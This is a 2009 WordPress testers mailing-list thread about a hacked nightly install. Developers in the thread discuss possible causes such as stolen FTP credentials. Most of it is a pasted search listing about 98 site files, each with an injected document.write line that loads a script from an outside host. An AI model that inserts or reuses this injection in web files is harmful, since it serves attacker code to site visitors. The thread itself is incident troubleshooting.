scan your upload folder for .php files. you might find an attacker script
in there.
tom
Am 20.11.2009, 10:57 Uhr, schrieb Dion Hulse (dd32) <[email protected]>:
it appears to have inserted that after </head> in all the .html and .php
files it could find. and the document.write in all .js's.
I dont think its a WordPress vulnerability, as its affecting the files
rather than actual posts..
I'd be tempted to suggest a full virus scan of your computer..
possibility its stealing your FTP credentials?
Any other websites on that account afected? what about files outside of
Wordpress?
On Fri, 20 Nov 2009 20:53:10 +1100, Naudirz <[email protected]> wrote:
here are more info
Search "northstarsocal.com" (98 hits in 98 files)
C:\Users\Användaren\Documents\Downloads\sidan\readme.html (1 hits)
Line 8: <script
src=http://northstarsocal.com/testpage/contact.php></script><body>
C:\Users\Användaren\Documents\Downloads\sidan\wordpress.2009-11-20.xml
(1
hits)
Line 1: <script
src=http://northstarsocal.com/testpage/contact.php></script><?xml
version="1.0" encoding="UTF-8"?>
C:\Users\Användaren\Documents\Downloads\sidan\wp-content\plugins\wp-security-scan\js\scripts.js
(1 hits)
Line 29: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-content\plugins\wp-security-scan\scripts.js
(1 hits)
Line 30: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\autosave.dev.js
(1 hits)
Line 309: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\autosave.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\codepress.html
(1 hits)
Line 30: if(engine == "msie" || engine == "gecko")
document.write('<script
src=http://northstarsocal.com/testpage/contact.php ></script><body><pre>
</pre></body>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\codepress.js
(1 hits)
Line 139: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\engines\gecko.js
(1 hits)
Line 294: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\engines\msie.js
(1 hits)
Line 305: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\engines\opera.js
(1 hits)
Line 262: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\asp.js
(1 hits)
Line 118: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\autoit.js
(1 hits)
Line 34: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\csharp.js
(1 hits)
Line 26: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\css.js
(1 hits)
Line 25: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\generic.js
(1 hits)
Line 27: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\html.js
(1 hits)
Line 61: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\java.js
(1 hits)
Line 26: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\javascript.js
(1 hits)
Line 32: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\perl.js
(1 hits)
Line 29: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\php.js
(1 hits)
Line 62: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\ruby.js
(1 hits)
Line 28: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\sql.js
(1 hits)
Line 32: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\text.js
(1 hits)
Line 11: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\vbscript.js
(1 hits)
Line 118: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\xsl.js
(1 hits)
Line 104: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\colorpicker.dev.js
(1 hits)
Line 709: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\colorpicker.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\comment-reply.dev.js
(1 hits)
Line 50: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\comment-reply.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\crop\cropper.js
(1 hits)
Line 518: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\hoverIntent.dev.js
(1 hits)
Line 129: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\hoverIntent.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\imgareaselect\jquery.imgareaselect.dev.js
(1 hits)
Line 693: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\imgareaselect\jquery.imgareaselect.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jcrop\jquery.Jcrop.dev.js
(1 hits)
Line 1199: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jcrop\jquery.Jcrop.js
(1 hits)
Line 164: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\interface.js
(1 hits)
Line 14: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.color.dev.js
(1 hits)
Line 130: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.color.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.form.dev.js
(1 hits)
Line 874: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.form.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.hotkeys.dev.js
(1 hits)
Line 129: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.hotkeys.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.js
(1 hits)
Line 22: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.schedule.js
(1 hits)
Line 37: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.table-hotkeys.dev.js
(1 hits)
Line 101: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.table-hotkeys.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\suggest.dev.js
(1 hits)
Line 331: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\suggest.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.core.js
(1 hits)
Line 11: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.dialog.js
(1 hits)
Line 16: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.draggable.js
(1 hits)
Line 14: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.droppable.js
(1 hits)
Line 15: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.resizable.js
(1 hits)
Line 14: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.selectable.js
(1 hits)
Line 14: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.sortable.js
(1 hits)
Line 14: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.tabs.js
(1 hits)
Line 14: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\json2.dev.js
(1 hits)
Line 483: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\json2.js
(1
hits)
Line 13: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\prototype.js
(1 hits)
Line 4185: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\quicktags.dev.js
(1 hits)
Line 579: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\quicktags.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\builder.js
(1 hits)
Line 138: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\controls.js
(1 hits)
Line 967: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\dragdrop.js
(1 hits)
Line 976: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\effects.js
(1 hits)
Line 1124: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\prototype.js
(1 hits)
Line 4185: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\scriptaculous.js
(1 hits)
Line 59: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\slider.js
(1 hits)
Line 277: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\sound.js
(1 hits)
Line 57: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\unittest.js
(1 hits)
Line 569: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\wp-scriptaculous.js
(1 hits)
Line 61: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfobject.js
(1 hits)
Line 6: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\handlers.dev.js
(1 hits)
Line 339: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\handlers.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.cookies.js
(1 hits)
Line 55: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.queue.js
(1 hits)
Line 100: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.speed.js
(1 hits)
Line 343: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.swfobject.js
(1 hits)
Line 107: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\swfupload-all.js
(1 hits)
Line 10: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\swfupload.js
(1 hits)
Line 982: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\thickbox\thickbox.js
(1 hits)
Line 323: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\blank.htm
(1 hits)
Line 6: <script
src=http://northstarsocal.com/testpage/contact.php></script><body
class="mceContentBody">
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\langs\wp-langs-en.js
(1 hits)
Line 433: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\tiny_mce.js
(1 hits)
Line 3: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\tiny_mce_popup.js
(1 hits)
Line 6: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\editable_selects.js
(1 hits)
Line 71: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\form_utils.js
(1 hits)
Line 201: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\mctabs.js
(1 hits)
Line 78: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\validate.js
(1 hits)
Line 221: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\wp-tinymce.js
(1 hits)
Line 30: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tw-sack.dev.js
(1 hits)
Line 195: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tw-sack.js
(1
hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-ajax-response.dev.js
(1 hits)
Line 66: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-ajax-response.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-lists.dev.js
(1 hits)
Line 361: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-lists.js
(1 hits)
Line 2: document.write('<script src=
http://northstarsocal.com/testpage/contact.php ><\/script>');
On Fri, Nov 20, 2009 at 9:57 AM, Dion Hulse (dd32)
<[email protected]>wrote:
What are the symptoms of the hack?
Install something to log all post requests ASAP, to gather data if its
a
new vulnerability: http://www.village-idiot.org/post-logger
You'd not by any chance be on MediaTemple servers would you? *(Who's
your
webhost)
On Fri, 20 Nov 2009 19:52:46 +1100, Naudirz <[email protected]> wrote:
OK, cause my 2.9 nightly gets hacked every day..
in that case its a new security bug..
Ive wasted every file/folde an done a fresh installation, everything
except
the db is new, also passwd is changed on everything except db.
No extra user is in db.
On Fri, Nov 20, 2009 at 9:39 AM, Dion Hulse (dd32)
<[email protected]
>wrote:
Yes. Everything in the 2.8 branch are backports from the 2.9 branch.
On Fri, 20 Nov 2009 19:35:20 +1100, Naudirz <[email protected]>
wrote:
Hi!
Is this fix also in 2.9 nightlybuild?
/Phibrz
On Thu, Nov 12, 2009 at 5:43 PM, Ryan Boren <[email protected]> wrote:
http://wordpress.org/wordpress-2.8.6-beta1.zip
Fixes these two security issues:
https://core.trac.wordpress.org/query?status=closed&group=resolution&milestone=2.8.6
A logged in user with author privileges is required to exploit.
Press
This and uploads need testing.
_______________________________________________
wp-testers mailing list
[email protected]
http://lists.automattic.com/mailman/listinfo/wp-testers
